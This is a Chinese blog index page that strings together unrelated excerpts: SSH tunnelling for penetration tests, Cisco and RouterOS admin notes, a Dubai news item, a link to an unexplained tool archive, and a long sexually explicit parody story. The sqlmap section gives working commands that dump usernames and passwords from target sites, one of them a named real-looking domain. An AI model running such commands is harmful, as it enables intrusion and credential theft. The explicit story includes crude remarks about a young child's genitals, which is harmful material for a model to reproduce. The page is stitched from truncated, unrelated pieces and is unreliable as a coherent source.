Chinadu's Blog

文 ring04h[EST]

在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者安全设备做了访问控制，无法通过互联网直接访问本地开放的服务，Windows方 面，国内通常选择Lcx.exe来进行端口转发，在应用方面大多数人也会选择reDuh来进行端口转发，而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题。
由于时间有限，本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。

SSH的三个端口转发命令：
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host

-f Fork into background after authentication.
后台认证用户/密码，通常和-N连用，不用登录到远程主机。

-p port Connect to this port. Server must be on the same port.
被登录的ssd服务器的sshd服务端口。

阅读全文...

获取数据库名

./sqlmap.py  -u "http://www.xx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --dbs

获取表名

./sqlmap.py  -u "http://www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database --tables

获取列名

./sqlmap.py  -u "http://www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_adminactions --columns

获取值

./sqlmap.py  -u "http://www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_members -C username,password --dump

来源：<a href="http://hi.baidu.com/p3rlish/blog/item/642cc6b5126297c736d3cace.html" target="_blank">影子</a>

更新

svn checkout  https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u  "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell  //执行SQL语句

sqlmap.py -u  "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5  //更详细的信息

load options from a configuration INI file
sqlmap -c  sqlmap.conf

阅读全文...

内网渗透在攻击层面，其实更趋向于社工和常规漏洞检测的结合，为了了解网内防护措施的设置是通过一步步的刺探和经验积累，有时判断出错，也能进入误 区。但是如果能在网内进行嗅探，则能事半功倍，处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破，到控制整个内网的全过程来跟大家讨论，内 网的渗透嗅探术和安全防护一些内容。

在寻找突破时，更多的是从应用服务来，而应用服务最直观的信息采集，就是端口扫描，不同的应用，开放的服务不一样。所以，在对网络进行信息收集时， 大概分为这样两步： 端口探测，程序指纹分析。在端口探测方面，个人喜欢用SuperScan来快速对网段里的应用进行判断，如图：

在掌握端口信息后，就要对服务应用程序的指纹进行分析，主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口，提交一个畸形的请求，如图：

阅读全文...

我和我老公没结婚以前，经常都是装着不认识，然后来个偶遇或者搭讪什么的，最好玩的就是，有一次，他骑摩托车到地铁出口来接我，我故意问，师傅，到 XX小区多少钱啊？(我们这边有好多摩托车师傅靠载人赚钱)
他说：不要钱，只要让我亲一下就好了。于是我就真的亲他一下，上了他的车。
搞的旁边那些摩的师傅一个个都傻了眼…
真的就相信了还说，小姑娘，不要上当啊！
恋爱那会儿，一天晚上老公(那时还是男友)送我回住处的路上，我要和他玩赛跑，老公有点小孩子性格，你要和他比赛他会很当真。
于是他撒丫子开始跑，我开始还逞强，但很快就被落下了，于边跑边冲着他大声喊：“抢劫啊，抢劫！”
路上不少人都看我们，老公一下窘了，于是放慢了步子，我一下超过了他，可他好像很不甘心，犹豫着继续跟着我跑，我看甩不掉他，又开始喊：“色狼，色狼，啊……。”
阅读全文...

来自：瓜园

不敢在服务器上乱跑别人的程序，自己写了个。

我的规则比较搓，不过支持自定义，全部正则。

代码太丑陋就不发了，想改功能的自己逆一下。

下载地址：http://www.4shell.org/upload/8d6c2ddcd7a296f68c102906.rar

1.用console线连接到交换机，通过超级终端或Secure CRT连接到交换机；
2.一直按住交换机前面板上的 MODE键，插上交换机电源；
3.约40秒后放开Mod

1.用console线连接到交换机，通过超级终端或Secure CRT连接到交换机；
2.一直按住交换机前面板上的 MODE键，插上交换机电源；
3.约40秒后放开Mode键；
4.此时会出现如下界面:
swith： flash_init
load_helper
boot
运行flash_init命令，然后输入如下命令：
rename flash:config.text flash:config.old //更名含有password的配置文件;
然后输入boot;
5.此时再输入enable，就可以直接进入特权模式（因为此时的配置文件已经没有password了此时再输入:
#rename flash:config.old flash:config.text
#copy flash:config.text system:running-config
6.修改新的口令:
#configure terminal
#enable secret 你的新口令
7.保存配置:wre键；

从开始学习ROS到现在也没有几天，在routerbbs里学到了 不少东西，回想初学的时候四处找教程的日子，也很是有点不好过。。其实已经有很多人写具体教程了，包括2.9版本的，例如winxp2000的教程--我 还是参考着他的教程写的备份脚本--只是没有图，不是很直观。来到routerbbs也不能只索取不付出不是，就算是对他们教程的图片补充也好。。。。下 面开始
1、安装ROS
除了自己学习和测试用ROS外，最好还是单独用一台机器，相信这也不用多说，安装的时候要注意的是硬盘一定要接在IDE0上面，并且作为主盘MASTER，光驱随便，很多安装之后不能正常启动的都是这个问题、用安装光盘启动后，如图1
图1

选择 i 进入安装界面选择需要安装的package，图2

阅读全文...

2009年12月01日 01:13

21世纪经济报道

迪拜地产神话倒塌的废墟下面掩埋了多少温州资本家？

本报记者 李伊琳 上海报道

“危机前在迪拜接手楼花的那些人，肯定给套死了。”

11月30日，温州籍的华星集团董事长王伟胜一边从电视上观看关于迪拜的那些惊心报道一边说。他的语气并不显得焦虑，甚至有点悠然，尽管他承认，他本人目前尚持有一定数量的迪拜房产。

上个周末，来自迪拜的风暴震撼全球金融市场。随着迪拜政府控股宣称“迪拜世界”债务偿还暂停6个月。一个建筑在棕榈岛、七星级酒店和世界第一摩天楼上的沙漠地产神话轰然倒塌。目前还不清楚在这倒塌的“废墟”里掩埋有多少温州的资本家。

在迪拜的15万华人中，浙江商人就占了2万多，其中很大一部分是温州商人。他们曾在这里的沙漠中迷上了“击鼓传花”的地产游戏，在100%的暴利疯狂中将惊人的泡沫引向爆破。

如今，神话破灭了，但他们当中很多人并无撤退之意。

阅读全文...

出娘胎记

我是BABY我怕谁

奇怪的声音

李磊是个坏小孩

父母总是唧唧歪歪

我心跳的像波浪鼓

放学路上的初吻

单车上的爱情

冬夜冰冷的夜

被窝里的秘密

他的手伸进我的上衣

初夜

我怀念和你的初吻，以及那第一夜的秋凉。

终于要毕业了，大家每天都沉浸在饭局和泪水之中。借着酒力，我和每一个曾经有过好感的男生拥抱，仿佛他们今生不会再出现在我的生活。马上要离开这个给了我欢喜和忧愁的校园，未知的世界在等着我，未知的男人也在等着

我们从这时开始建立起一种以快乐为宗旨的关系。我们像所有的情人一样，相互交换和分享着快乐、痛苦、失望和期望。谁也没有想过将来要怎么样。我的身体很 好，可是我很喜欢笑着谈论“死”的话题。有一天我说，如果我死了，我只要你一滴眼泪。他笑着捏我的鼻子，说，和我在一起，你怎么会死呢？然后吻我，不让我 说下去。这段关系以我的意外怀孕而告终。当我躺在手术台上结束孩子的生命时，对自己说：“别怕，他会站在手术室外拥抱我的。”但是，他没有出现。我删掉了 他的电话号码，他没必要再出现。

有一天，我喝了不少酒，打开家门口时已经头疼欲裂，突然有个人在身后出现，一把搂住了我，然后是令我喘不过气来的强吻。……醉酒之后的做爱恍如梦中进行的 一般，你知道对方在干什么，但是感受是那么的不真实，卡纷进入的时候，我只有被动地接受，一下，两下，三下……他的动作干脆利落，使我有种被猎获的耻辱 感，但是我没法动弹，我不能再给他一个耳光……最后，当克制不住的快感使我颤抖之时，当我忍无可忍终于叫出声的时候，他狠狠地咬了我一口，然后我听到他说 了句：“我爱你。”

我只想说：偷来的性高潮，尤其快乐。但是快乐过后的空虚，让我忽然很想念和Lilei过去的时光。我抽了好几只烟，才放任自己给Lilei打了一个电话——我说：“我要回到你身旁……”。他竟然答应了，电话那边的声音有点模糊，是他哭了

于是，我们走入婚姻的殿堂，父母的笑容，丈母娘的眼泪，同学的唏嘘，前女友的漠然，一切都进行的顺理成章。婚礼上的你我衣冠楚楚，婚纱照上的你我一脸迷茫。那个晚上我们做了很久，我问你是哪里来的人鱼，于是那个夜晚就像童话一样漫长。
我们结婚了，所有的婚姻的开始都简单而俗气，嗯，就是这样。只有那个夜晚让我铭记

黎明时传来噩耗，我们结婚时，上铺的兄弟死于布达拉宫边上的澡堂，他死在一个姑娘身上，五指伸长，据说他的灵魂可以得到宽恕，因为他在离去的时候，双眼正仰望着那湛蓝的天堂。
Lilei的好哥们儿伴着快感死去，或许他是幸福的，我望着身边的这个男人，会不会有一天他也这样离去？

好景不长，一个叫儿子的东西钻出了Han Meimei的身体，六斤七两，蛋黑把长，你说这是我们爱的结晶，我想这或许又是噩梦一场，我的父母把弄着孙子的命根，抹着眼泪说咱家从今以后子孙满堂。

我美丽苗条的Han Meimei成了宽宽胖胖的孩儿他娘，每天防着儿子在房里叮当乱撞，工作和家庭让我筋疲力尽，每天只想赖在舒服的床。这孩子聪明得像是妖精，刚学会说话就看着电视上一张大脸喊出了张朝阳。

俗话说，女人三十如狼四十如虎，我的Han Meimei却像只猛犸象，她不再保持身材，却有着更辣更久的欲望，每当孩子入睡，她就把俺拽向炕角，夜幕下，那是一张略带恐怖的脸庞，只是兄弟我日渐萎靡，不惑之年，胯下已经不再是一杆神枪。

但随着孩子慢慢长大，我发现欲望就像蛇又回到我的身体，也许是因为孩子在身边，那件事显得有种隐蔽的刺激。我在无限的缠绵中体会婚姻最初的热情，却发现Lilei的热情好像在渐渐的溜走。是孩子改变了我的身体，或者，是岁月改变了一切？

上帝保佑，一度皱眉的Han Meimei开始再度温柔，因为她的儿子才上小学，那玩意就长得比iphone还长。家长会上，老师说你们的儿子越来越喜欢进女厕所，我亲爱的Han Meimei便怒斥他是个文盲。她把我晾在一边，越来越关心儿子在屋里的样子，因此隔三差五才能想起来让我交出公粮。

收拾残躯，重整旗鼓，我所谓的事业突飞猛进，上班大奔，周末公羊，我剥削着500多个城市的白领民工，我买的中石油终于勃起得硬硬邦邦。我的Han Meimei说老公不错，而后把我的钱全存进了她的私人银行。办公室招来了新的小蜜，名叫Janny，前凸后撅，很像我老婆当年的长相，只是这狐狸精太过 放肆，开着董事会都是一副怀春模样。我说着企业战略公司管理，可脑子里禁不住想着她的裙下春光，我像小学生那样坐立不安，我的心像和Andy的第一次那样 莺飞草

那天傍晚外边打雷，我在办公室看着云外的夕阳，对天发誓这绝不是预谋，因为今晚还要和老婆去逛商场。Janny不知何时走了进来，说要向我汇报情况，我问 为什么你还不回家，她说回了家也是一个人独守空房。古人云啥也别说了，我们在宽大的办公桌上开辟了战场，奔六张的我竟然梅花三弄金枪不倒，这20岁的姑娘 都说超爽超

我开始爱上了洗衣服，我想洗去Lilei衬衫上的陌生香水味，使劲地洗，可总是洗不干净。我把它们放在夏天很刺眼的阳光下晒，可是最后还是会有香水的味 道。你的毛衣，我亲手织的毛衣啊，它们也沾上了永远洗不干净的口红印。这是什么牌子的口红？我想去买一管，因为它是如此的持久。而我的口红却总是在热吻之 后消失。

我的儿子在重复着我的故事，只是他比我当年要厉害百倍，才干工作两年就换了七八个姑娘。他娘Han Meimei说小流氓随了老流氓，我说和谐社会年轻人都在成长。儿子不愿听我们老掉牙的故事，他说这年头女人只认钱，其他的都是逢场作戏嘿咻一场。

我老了，不可思议地老了，很多人管我叫大爷，我再也不认为是在骂人。女护士在我身上绑了一个起搏器，我说能否给我下半身也装一个电香肠，小护士说老大爷你 色性难改，我那在轮椅上的老婆说他也就是说说装相。每一个夜晚我都怀疑明天能否醒来，每一个早晨Han Meimei都要伏在我的胸膛，他说你可不能走在我的前面，否则夜里这张床上就会太过冰凉。

他会在我睡着的午后，静静地看着我，然后在阳光下读一本书。而我则经常在他睡着之后，用手抚摸他的额头

19岁的儿子去大学住校前，我最后一次给儿子洗内裤。阳光下，上面的存留物质闪闪发亮。那东西有着特殊的气味，在每个人的鼻子下，是不一样的。这是我的告别礼。

儿子终于有了他的合法配偶，她长得像卖人肉包子的孙二娘，Han Meimei整天在偷偷哭泣，说她心疼咱们的儿子，怎么他就取回来这么个蛮横糟糠。我倒不觉得儿子是吃错了药，那女人一定在床上特别擅长，他们的生活犹如黄钟大吕，整天把席梦思整的兵兵邦邦。

好在这媳妇还算踏实，很快就生出一个孩子，Han Meimei上前翻了半天，脸色阴沉，跟我说她的心拔凉拔凉。这孩子再不会蛋黑把长，因为她根本就没长出那么个鸟样。

我参加了众多朋友的婚礼，有男有女，每个人脸上都画着希望，据说大学6班的那个荡妇嫁给了一个荣誉军人，而我上铺的兄弟逢人便说娶了一个黄花姑娘。还有几个不断离婚不断再婚的酒友，一边比着谁的年轻老婆更为败家，一边打着没有输赢的上楼麻将。

68岁的我，当了祖母。那个时候我正在家里煮着鸡汤，丈夫在客厅接了电话，儿子告诉他，我们刚刚有了第三代。我迫不及待地赶去医院，满心欢喜地要看看他的 把儿有多长，可事实却让我那么的失望，虽然她也长得像天使一样可爱。然而，这孩子却不再蛋黒把长，真的，别怪我重男轻女，那是不一样的滋味。

经常路过我家门口的那只老猫再没出现，想必是不知老死在哪个垃圾场。我连下床都变得艰难，可我亲爱的Han Meimei竟然又能下地，她说她梦见了少年时的我，拉着她跑过一片片红色的高粱。

我们都老了，我明显地觉得腿脚不如从前，爬楼的时候是那么的吃力，而我的Lilei连下床都很困难。我爱上了回忆，无论是白天还是梦里，我想着Lilei，也想着记忆中曾经说过爱我的那些男人，偶尔竟然会有想要的欲望。

那天她帮我洗澡，在温暖的浴缸里，她的手温柔地抚过我的身体，我惊讶地发现那个东西竟然翘起，我浑身都有要飞的轻畅。Han Meimei说你个老鬼还不正经，当心摧毁你那脆弱的心脏。我笑着答看来杨振宁也不过如此，没准我是比他还要好使的一把老枪。Han Meimei爱抚地摸着那个东西，眼角竟有了淡淡的泪光，她说如果你愿意，我们就玩儿命再干上最后一场。

Lilei已经一周没有洗澡，我搀扶他坐进浴缸，摸着他依然厚实的肩膀，内心里多了些许的感伤，这是我守了大半辈子的男人，可总有一天我们要各自奔天堂。Lilei不顾死活地要重拾起他那把老枪，而这一次也成就了我们一生的最难忘。

Lilei住院了，毕竟已是70几岁的人，哪经得住那样的疯狂。儿孙每日奔波于医院和家，而我也会为他煲上一锅汤。我依然终日沉浸在回忆之中，不久于世的 伤感让我渴望听到那些曾经跟我耳鬓厮磨过的声音。颤抖地拿起电话，一通、两通、三通…那些给过我高潮的男人们却都已经离开了这个美丽的人

从此我们再无遗憾，我们每天拉着手，满意地坐在门口的摇椅上，门口来了新的小猫，它喜欢抱着我们的腿，舔着我们的

我终于彻底死心，全心全意地迎接我出院归来的Lilei。我们又仿佛回到少年时的模样，每天拉着手慢慢地走在路上，说着只有我俩才懂的情伤。

不知不觉我们的孙女又生了一个大胖小子，我们家竟然已经四世同堂。已经要瞎眼的Han Meimei大声说赶紧看看那玩意儿究竟什么成色，孙女婿说是白花花的一串，有点像老头花生的怪样。Han Meimei嘟囔着说这小子不是李家人，将来很可能窝窝囊囊。我说你干吗操这一百年后的心，眼都瞎了还惦记着那玩意多黑多长

92岁，我有了重孙子，我们家竟然已经四世同堂。但是我已经看不清那孩子什么模样。孩子刚学会走路不久，Lilei在一次踏青中脑溢血住进了重症病房。

那天我们依然在一起晒着太阳，刚会走路的重孙子向我伸出小手，我猜是他想让我帮他撒尿，就挣扎起来要把他抱上。我的眼前突然发黑，然后跟着掠起一片白光。醒来时我已经躺倒在地，孩子的温暖的尿正呲在我的脸上，我想喊我的Han Meimei，可却不忍打搅她的梦乡。

我知道这颗心脏就要停止跳动，可我宁愿如此，默默地去寻找传说中的天堂。那孩子哭着叫着，我只微笑着看着他颤巍巍的小鸡鸡，轻声说孩子别怕，老爷爷就此去了，你的路还有很长，很长……

Lilei终于弃我而去。作为一个女人，我的一生如此丰富。有激情，有痛苦，有欢乐，有眼泪。作为一个女人，我也许不是规矩和忠诚的。但我忠于自己的身 体，和自己的欲望；我对得起自己，也不想伤害别人。如果我做的不够好，请原谅。我，只是个最普通不过的女人而已。说不定，如我这样的女人，应该也可以上天 堂。

镜子里我的头发仍然乌黑，可那地方的毛却变得花白，Han Meimei说显然小头比大头还要操劳，你在外边肯定是男盗女娼。过了60你就一只脚进了棺材，看哪天一条狐狸把你拉进坟场。对毛主席发誓，我只有那一次 意外的疯狂，那狐狸精早已被我赶到深圳，去当了一个做假证老板的新娘。我的前列腺开始出现毛病，看见美女再不会心荆荡漾。那曾经困惑的欲望终于莫名衰退， 估计一年也弄不出精液半两。

PS:这是新时代白领生活压抑的产物